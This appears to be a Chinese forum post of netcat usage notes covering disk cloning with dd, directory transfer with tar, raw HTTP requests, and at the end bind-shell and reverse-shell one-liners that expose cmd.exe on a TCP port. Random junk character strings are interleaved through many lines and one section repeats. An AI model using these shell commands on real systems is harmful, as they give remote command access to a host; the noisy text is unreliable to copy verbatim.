tcpdump 、nc的使用记录

admin

克隆硬盘或分区
  q) W: y! C+ [- d3 J操作与上面的拷贝是雷同的，只需要由dd获得硬盘或分区的数据，然后传输即可。
克隆硬盘或分区的操作，不应在已经mount的的系统上进行。所以，需要使用安装光盘引导后，进入拯救模式（或使用Knoppix工 具光盘）启动系统后，在server2上进行类似的监听动作：
' s5 ]/ z% A7 h. V* f/ L- T2 ?# nc -l -p 1234 | dd of=/dev/sda

server1上执行传输，即可完成从server1克隆sda硬盘到server2的任务：
# dd if=/dev/sda | nc 192.168.228.222 1234

& I1 H/ u, U2 D4 h※ 完成上述工作的前提，是需要落实光盘的拯救模式支持服务器上的网卡，并正确配置IP。

admin

克隆硬盘或分区
$ [  l6 Q. e2 |, L操作与上面的拷贝是雷同的，只需要由dd获得硬盘或分区的数据，然后传输即可。
克隆硬盘或分区的操作，不应在已经mount的的系统上进行。所以，需要使用安装光盘引导后，进入拯救模式（或使用Knoppix工 具光盘）启动系统后，在server2上进行类似的监听动作：
- d) B0 J! C* m' C7 B# nc -l -p 1234 | dd of=/dev/sda
$ o& y  r* E  A! b: w" P  l
server1上执行传输，即可完成从server1克隆sda硬盘到server2的任务：
# dd if=/dev/sda | nc 192.168.228.222 1234

※ 完成上述工作的前提，是需要落实光盘的拯救模式支持服务器上的网卡，并正确配置IP。

1320503165

保存Web页面
# while true; do nc -l -p 80 -q 1 < somepage.html; done

1320503165

模拟HTTP Headers,获取网页源代码和返回头部信息
7 o9 \6 j4 ?3 D' g8 x0 \
/ t5 q3 R* b% I7 p9 A[root@hatest1 ~]# nc www.linuxso.com 80
GET / HTTP/1.1
# f) _+ w! Z0 a' }* {& E7 {Host: ispconfig.org
  e0 v% A; j/ X: y, F- CReferrer: mypage.com
1 o" N, S: q* e" v- XUser-Agent: my-browser

HTTP/1.1 200 OK
4 r( }- J5 \* `7 {7 VDate: Tue, 16 Dec 2008 07:23:24 GMT
Server: Apache/2.2.6 (Unix) DAV/2 mod_mono/1.2.1 mod_python/3.2.8 Python/2.4.3 mod_perl/2.0.2 Perl/v5.8.8
Set-Cookie: PHPSESSID=bbadorbvie1gn037iih6lrdg50; path=/
Expires: 0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Cache-Control: private, post-check=0, pre-check=0, max-age=0
6 J& J- j& P% [6 j' pSet-Cookie: oWn_sid=xRutAY; expires=Tue, 23-Dec-2008 07:23:24 GMT; path=/
Vary: Accept-Encoding
7 r9 f1 @! r7 eTransfer-Encoding: chunked
Content-Type: text/html
7 [4 [3 X3 D8 N* t; B[......]
在nc命令后，输入红色部分的内容，然后按两次回车，即可从对方获得HTTP Headers内容。


5 D0 Z- d9 Z* T6 a; m: k+ e
4 |# V0 x1 C/ F( g4 {: ]4 W& ?  I传输目录
+ _9 `& @  g& K$ D从server1拷贝nginx-0.6.34目录内容到server2上。需要先在server2上，用nc激活监听，server2上运行：
引用

, q" A* S& H& p% w: N% m1 M[root@hatest2 tmp]# nc -l 1234 |tar xzvf -
; }7 s& M4 G4 I- Y0 }8 x: @server1上运行：
引用
3 u7 s/ r. W; P- p
) e% ~: U. s$ C[root@hatest1 ~]# ll -d nginx-0.6.34
/ [, s1 |: d# S, [  C6 bdrwxr-xr-x 8 1000 1000 4096 12-23 17:25 nginx-0.6.34
( m2 f" E% U& l0 V[root@hatest1 ~]# tar czvf – nginx-0.6.34|nc 192.168.228.222 1234

4 A' H/ L- s3 I& w( ?# m
$ \! C& H0 i% C( Y3 o
. J5 o! i+ C0 J* J! R6 @REMOTE主机绑定SHELL
例子：
2 u, V1 C3 |; K( Z" ]' @
& l5 M% S8 r, A5 x格式：nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
讲解：绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口

  @; u! \% O3 V4 I
9 u# W: R0 j! n9 T7 T9 qREMOTE主机绑定SHELL并反向连接
, V4 x7 y# d3 ?5 Z+ R例子：

格式：nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354
讲解：绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口
8 |: i: Q: V4 C' W. S" H- n3 |以上为最基本的几种用法（其实NC的用法还有很多，
3 N5 @7 n6 \$ p, Q当配合管道命令"|"与重定向命令"<"、">"等等命令功能更强大......）